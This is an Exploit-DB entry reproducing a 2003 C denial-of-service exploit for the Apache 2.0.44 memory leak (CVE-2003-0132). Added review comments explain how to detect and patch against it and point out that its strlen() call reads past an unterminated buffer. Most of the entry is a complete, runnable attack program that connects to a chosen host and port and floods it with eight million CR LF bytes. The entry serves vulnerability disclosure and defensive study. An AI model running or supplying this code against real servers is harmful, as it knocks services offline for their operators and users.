Apache <= 2.0.44 Linux - Remote Denial of Service Exploit

2003-04-11T00:00:00
ID EDB-ID:11
Type exploitdb
Reporter Daniel Nystram
Modified 2003-04-11T00:00:00

Description

Apache <= 2.0.44 Linux Remote Denial of Service Exploit. CVE-2003-0132. DoS exploit for the Linux platform.

                                        
                                            /******** th-apachedos.c ********************************************************
* *
* Remote Apache DoS exploit *
* ------------------------- *
* Written as a poc for the: *
* 
* This program sends 8000000 \n's to exploit the Apache memory leak. *
* Works from scratch under Linux, as opposed to apache-massacre.c . *
* 
* 
* Daniel Nyström <exce@netwinder.nu> *
* 
* - www.telhack.tk - *
* 
******************************************************** th-apachedos.c ********/

#include &lt;stdio.h&gt;
#include &lt;stdlib.h&gt;
#include &lt;string.h&gt;
#include &lt;errno.h&gt;
#include &lt;sys/types.h&gt;
#include &lt;netinet/in.h&gt;
#include &lt;netdb.h&gt;
#include &lt;sys/socket.h&gt;


/*
 * Proof-of-concept client for the Apache memory leak tracked as CVE-2003-0132
 * (Apache up to and including 2.0.44, per the header of this page).
 *
 * Usage: argv[1] is the host name, argv[2] the TCP port. The program opens one
 * TCP connection and writes a buffer made only of CR LF pairs; no HTTP request
 * line or header is ever sent.
 *
 * Defensive reading: on the wire this is a single connection carrying a very
 * long run of blank lines ahead of any request. A proxy or IDS in front of the
 * server can alert on or cut off such a run, and httpd memory growth during
 * the connection is the host-side symptom. Servers in the affected range need
 * a release later than 2.0.44.
 *
 * Exits with -1 on a usage error or on any failed resolver/socket call.
 */
int main(int argc, char *argv[])
{
int sockfd;
int count;
/* NOTE(review): 8,000,000 bytes of automatic storage; whether this fits
   depends on the process stack limit. */
char buffer[8000000];
struct sockaddr_in target;
struct hostent *he;

/* Exactly two arguments are required; otherwise print usage and stop. */
if (argc != 3)
{
fprintf(stderr, "\nTH-apachedos.c - Apache &lt;= 2.0.44 DoS exploit.");
fprintf(stderr, "\n----------------------------------------------");
fprintf(stderr, "\nUsage: %s &lt;Target&gt; &lt;Port&gt;\n\n", argv[0]);
exit(-1);
}

printf("\nTH-Apache DoS\n");
printf("-------------\n");
printf("-&gt; Starting...\n"); 
printf("-&gt;\n");

// memset(buffer, '\n', sizeof(buffer)); /* testing */

/* Fill every byte of the buffer with alternating CR and LF. The last index
   written is 7999999, so no terminating NUL is ever stored. */
for (count = 0; count &lt; 8000000;) 
{
buffer[count] = '\r'; /* 0x0D */
count++;
buffer[count] = '\n'; /* 0x0A */
count++;
}

/* Resolve the host name; only the first returned address is used below. */
if ((he=gethostbyname(argv[1])) == NULL)
{
herror("gethostbyname() failed ");
exit(-1);
}

/* Build the IPv4 destination. The port goes through atoi() with no range or
   error check, so a non-numeric argument yields port 0. */
memset(&target, 0, sizeof(target));
target.sin_family = AF_INET;
target.sin_port = htons(atoi(argv[2]));
target.sin_addr = *((struct in_addr *)he-&gt;h_addr);

printf("-&gt; Connecting to %s:%d...\n", inet_ntoa(target.sin_addr), atoi(argv[2]));
printf("-&gt;\n");

if ((sockfd=socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) &lt; 0)
{
perror("socket() failed ");
exit(-1);
}

if (connect(sockfd, (struct sockaddr *)&target, sizeof(struct sockaddr)) &lt; 0)
{
perror("connect() failed ");
exit(-1);
}

printf("-&gt; Connected to %s:%d... Sending linefeeds...\n", inet_ntoa(target.sin_addr),
atoi(argv[2]));
printf("-&gt;\n");

/* NOTE(review): the length comes from strlen() on a buffer that holds no NUL,
   so strlen() reads past the end of the array (undefined behaviour) and the
   number of bytes handed to send() is not guaranteed to be 8000000. Detection
   should therefore key on the CRLF-only pattern, not on an exact byte count.
   A short write from this single send() call is reported as a failure. */
if (send(sockfd, buffer, strlen(buffer), 0) != strlen(buffer))
{
perror("send() failed ");
exit(-1);
/* Unreachable: exit() above does not return. */
close(sockfd);
} 


close(sockfd);

printf("-&gt; Finished smoothly, check hosts apache...\n\n");
}

// milw0rm.com [2003-04-11]